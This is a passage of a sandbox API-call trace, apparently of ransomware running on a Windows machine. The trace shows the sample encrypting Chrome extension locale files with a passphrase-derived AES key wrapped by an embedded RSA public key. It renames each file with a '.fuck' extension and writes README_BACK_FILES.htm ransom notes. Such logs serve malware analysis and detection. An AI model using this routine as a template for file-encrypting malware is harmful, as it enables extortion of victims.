returned 1 [0252.294] CloseHandle (hObject=0x5d5c) returned 1 [0252.294] CloseHandle (hObject=0x5d64) returned 1 [0252.294] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json"), bFailIfExists=0) returned 1 [0252.298] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x0) returned 1 [0252.298] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json.gsg")) returned 1 [0252.300] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json.fuck")) returned 1 [0252.301] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.301] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.301] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.301] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.301] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.301] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\readme_back_files.htm")) returned 0xffffffff [0252.302] AreFileApisANSI () returned 1 [0252.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 158 [0252.302] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.302] GetFileType (hFile=0x5d60) returned 0x1 [0252.303] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.304] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.304] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.304] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.304] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.304] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.304] GetLastError () returned 0x0 [0252.304] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json")) returned 0x20 [0252.305] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json", dwFileAttributes=0x80) returned 1 [0252.306] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.306] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.308] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.309] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.311] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.311] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.311] CryptHashData (hHash=0x29846a0, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.311] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.311] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.311] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.311] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298c460) returned 1 [0252.312] CryptImportPublicKeyInfo (in: hCryptProv=0x298c460, dwCertEncodingType=0x1, pInfo=0x2994720*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2994750*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2994758*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984ea0) returned 1 [0252.312] CryptEncrypt (in: hKey=0x2984ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.312] CryptEncrypt (in: hKey=0x2984ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298b7a0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298b7a0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.312] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298b7a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298b7a0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.313] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.315] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.315] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.315] CloseHandle (hObject=0x5d64) returned 1 [0252.315] CloseHandle (hObject=0x5d5c) returned 1 [0252.315] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json"), bFailIfExists=0) returned 1 [0252.319] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json", dwFileAttributes=0x0) returned 1 [0252.320] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.gsg")) returned 1 [0252.321] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.fuck")) returned 1 [0252.322] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.322] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.322] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.322] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.322] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.322] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\readme_back_files.htm")) returned 0xffffffff [0252.322] AreFileApisANSI () returned 1 [0252.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.323] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.323] GetFileType (hFile=0x5d60) returned 0x1 [0252.323] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.325] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.325] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.325] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.325] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.325] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.325] GetLastError () returned 0x0 [0252.325] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json")) returned 0x20 [0252.325] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json", dwFileAttributes=0x80) returned 1 [0252.326] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.326] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.327] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.327] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.330] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.330] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.330] CryptHashData (hHash=0x2983fe0, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.330] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2983fe0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29846a0) returned 1 [0252.330] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.330] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.330] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298c0a8) returned 1 [0252.330] CryptImportPublicKeyInfo (in: hCryptProv=0x298c0a8, dwCertEncodingType=0x1, pInfo=0x2993060*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993090*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993098*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984ce0) returned 1 [0252.330] CryptEncrypt (in: hKey=0x2984ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.331] CryptEncrypt (in: hKey=0x2984ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298be00*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298be00*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.331] WriteFile (in: hFile=0x5d64, lpBuffer=0x298be00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298be00*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.332] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.333] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.333] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.333] CloseHandle (hObject=0x5d5c) returned 1 [0252.333] CloseHandle (hObject=0x5d64) returned 1 [0252.333] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json"), bFailIfExists=0) returned 1 [0252.337] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json", dwFileAttributes=0x0) returned 1 [0252.337] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.gsg")) returned 1 [0252.339] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.fuck")) returned 1 [0252.340] CryptDestroyHash (hHash=0x2983fe0) returned 1 [0252.340] CryptDestroyKey (hKey=0x29846a0) returned 1 [0252.340] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.340] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.340] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.340] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\readme_back_files.htm")) returned 0xffffffff [0252.340] AreFileApisANSI () returned 1 [0252.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: 